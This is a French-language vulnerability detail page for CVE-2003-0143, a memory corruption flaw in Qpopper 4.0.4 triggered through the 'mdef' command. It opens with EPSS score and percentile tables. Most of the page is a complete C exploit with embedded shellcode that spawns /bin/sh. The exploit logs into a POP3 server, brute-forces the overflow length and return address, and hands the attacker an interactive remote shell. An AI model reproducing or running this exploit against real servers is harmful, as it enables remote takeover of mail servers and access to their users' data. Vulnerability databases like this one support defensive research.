CVE-2003-0143 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	11.86%	–	–
2022-04-03	–	–	11.86%	–	–
2023-03-12	–	–	–	1.2%	–
2023-09-17	–	–	–	1.2%	–
2024-02-11	–	–	–	1.2%	–
2024-06-02	–	–	–	1.2%	–
2024-09-08	–	–	–	1.2%	–
2024-09-22	–	–	–	1.2%	–
2024-10-06	–	–	–	1.2%	–
2024-12-22	–	–	–	1.2%	–
2025-01-19	–	–	–	1.2%	–
2025-03-18	–	–	–	–	10.95%
2025-03-30	–	–	–	–	12.83%
2025-03-30	–	–	–	–	12.83,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	89%
2022-04-03	95%
2023-03-12	83%
2023-09-17	84%
2024-02-11	85%
2024-06-02	85%
2024-09-08	86%
2024-09-22	85%
2024-10-06	86%
2024-12-22	85%
2025-01-19	85%
2025-03-18	93%
2025-03-30	93%
2025-03-30	93%

// source: https://www.securityfocus.com/bid/7058/info A memory corruption vulnerability has been discovered in Qpopper version 4.0.4 and earlier. The vulnerability occurs when calling the 'mdef' command and a malicious macro name is supplied. By filling a target buffer with a malicious macro name it may be possible to trigger a procedure that would cause sensitive memory to be corrupted. The problem occurs due to the lack of NULL termination by the Qvsnprintf() function. Successful exploitation of this issue may allow a remote attacker to execute arbitrary commands with the privileges of the Qpopper service. #include <sys/socket.h> #include <sys/select.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> char shellcode[] = "\x31\xc0" /* xor %eax, %eax */ "\x31\xdb" /* xor %ebx, %ebx */ "\xb0\x17" /* mov $0x17, %al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xor %eax, %eax */ "\x50" /* push %eax */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x89\xe3" /* mov %esp,%ebx */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x89\xe1" /* mov %esp,%ecx */ "\x31\xd2" /* xor %edx,%edx */ "\xb0\x08" /* mov $0x8,%al */ "\x40\x40\x40" /* inc %eax (3 times) */ "\xcd\x80"; /* int $0x80 */ #define BUFLEN 1006 #define RETLEN 148 #define RETADDR 0xbfffc004 void shell_io (fd) int fd; { fd_set fs; char buf[1000]; int len; while (1) { FD_ZERO(&fs); FD_SET(0, &fs); FD_SET(fd, &fs); select(fd+1, &fs, NULL, NULL, NULL); if (FD_ISSET(0, &fs)) { if ((len = read(0, buf, 1000)) <= 0) break; write(fd, buf, len); } else { if ((len = read(fd, buf, 1000)) <= 0) break; write(1, buf, len); } } } void send_mdef (fd, buflen, retaddr, rashift) int fd, buflen, rashift; unsigned int retaddr; { char buf[2000], *bp; int i; memset(buf, 0x90, 2000); memcpy(buf, "mdef ", 5); memcpy(buf + buflen - RETLEN - strlen(shellcode), shellcode, strlen(shellcode)); bp = (char *) (((unsigned int)(buf + buflen - RETLEN)) & 0xfffffffc); for (i = 0; i < RETLEN; i += 4) memcpy(bp+i+rashift, &retaddr, sizeof(int)); buf[buflen-2] = '('; buf[buflen-1] = ')'; buf[buflen] = '\n'; write(fd, buf, buflen+1); return; } int get_pop_reply (int fd, char *buf, int buflen) { int len; fd_set s; struct timeval tv; len = read (fd, buf, buflen); FD_ZERO(&s); FD_SET(fd, &s); tv.tv_sec = tv.tv_usec = 0; select(fd+1, &s, NULL, NULL, &tv); if (FD_ISSET(fd, &s)) len = read (fd, buf, buflen); if (len == 0) return 0; else if (!strncmp(buf, "-ERR ", 5)) return -1; else return len; } int open_pop(ip, user, pass) unsigned int ip; char *user, *pass; { struct sockaddr_in peer; int fd, st = 0; char buf[1024]; int state = 0; peer.sin_family = AF_INET; peer.sin_port = htons(110); peer.sin_addr.s_addr = ip; fd = socket(AF_INET, SOCK_STREAM, 0); if (fd < 0) { perror("socket"); exit(EXIT_FAILURE); } printf("Connecting to %s... ", inet_ntoa(peer.sin_addr)); fflush(stdout); if (connect(fd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) { perror("connect"); exit(EXIT_FAILURE); } printf("Logging in... "); fflush(stdout); while ((state < 3) && ((st = read(fd, buf, 1024)) > 0)) { if (!strncmp(buf, "+OK ", 4)) { switch (state) { case 0: snprintf(buf, 1024, "USER %s\n", user); write(fd, buf, strlen(buf)); state++; break; case 1: snprintf(buf, 1024, "PASS %s\n", pass); write(fd, buf, strlen(buf)); state++; break; case 2: state++; break; } } else if (!strncmp(buf, "-ERR ", 5)) { fprintf(stderr, "Could not log in. Did you provide a valid " "username/password-combination?\n"); break; } else { fprintf(stderr, "Invalid response from POP-Server:\n'%s'\n", buf); break; } } if (state < 3) { fprintf(stderr, "Exiting due to error...\n"); exit(EXIT_FAILURE); } else if (st < 0) { perror("read"); exit(EXIT_FAILURE); } else if (st == 0) { fprintf(stderr, "Peer closed...\n"); exit(EXIT_FAILURE); } return fd; } int main (argc, argv) int argc; char *argv[]; { char *host, *user, *pass; struct hostent *he; struct in_addr in; unsigned int ip, retaddr; int fd = -1, lbs, bs, ubs, found = 0, st; char buf[2000]; if (4 != argc) { fprintf(stderr, "Usage: %s <host> <user> <pass>\n\n", argv[0]); exit(EXIT_FAILURE); } host = argv[1]; user = argv[2]; pass = argv[3]; if (!inet_aton(host, &in)) { if (!(he = gethostbyname(host))) { herror("Resolving host"); exit(EXIT_FAILURE); } in.s_addr = *((unsigned int *)he->h_addr); } ip = in.s_addr; printf("Phase 1: Seeking buffer size\n"); lbs = 0; bs = BUFLEN; ubs = 2000; while (!found && (bs != lbs) && (bs != ubs)) { if (fd < 0) fd = open_pop(ip, user, pass); printf("Trying %d bytes... ", bs); fflush(stdout); send_mdef(fd, bs, 0x01010101, 0); sleep(1); switch ((st = get_pop_reply(fd, buf, 2000))) { case 0: found++; close(fd); fd = -1; break; case -1: printf("too long.\n"); ubs = bs; bs = (lbs+ubs)/2; break; default: if (st < bs) { printf("(slightly) too long.\n"); ubs = bs; bs = (lbs+ubs)/2; break; } else { printf("too short.\n"); lbs = bs; bs = (lbs+ubs)/2; break; } } } if (!found) { printf("Couldn't find correct buffersize...\n"); exit(EXIT_FAILURE); } printf("crash.\n"); while (found) { bs--; if (fd < 0) fd = open_pop(ip, user, pass); printf("Trying %d bytes... ", bs); fflush(stdout); send_mdef(fd, bs, 0x01010101, 0); sleep(1); if (get_pop_reply(fd, buf, 2000)) { printf("no crash\n"); bs += 4; bs = bs & 0xfffffffc; found = 0; } else { fd = -1; printf("crash\n"); } } printf("Optimal buffer size: %d\n\n", bs); printf("Phase 2: Find return address\n"); found = 0; retaddr = RETADDR; while (!found) { if (fd < 0) fd = open_pop(ip, user, pass); printf("Trying %x... ", retaddr); fflush(stdout); send_mdef(fd, bs, retaddr, 2); sleep(1); if (get_pop_reply(fd, buf, 2000)) { printf("no crash\n"); found = 1; } else { fd = -1; retaddr += ((bs - RETLEN - 10 - strlen(shellcode)) & 0xffffff00); printf("crash\n"); } if (retaddr > 0xbfffff00) break; } if (!found) { printf("Couldn't find a valid return address\n"); exit(EXIT_FAILURE); } write(fd, "uname -a\n", 9); st = read(fd, buf, 100); buf[st] = '\0'; if ((buf[0] != '-') && (buf[0] != '+')) { printf("We're in! (%s)\n", buf); shell_io(fd); } else printf("We failed...\n"); exit(EXIT_FAILURE); }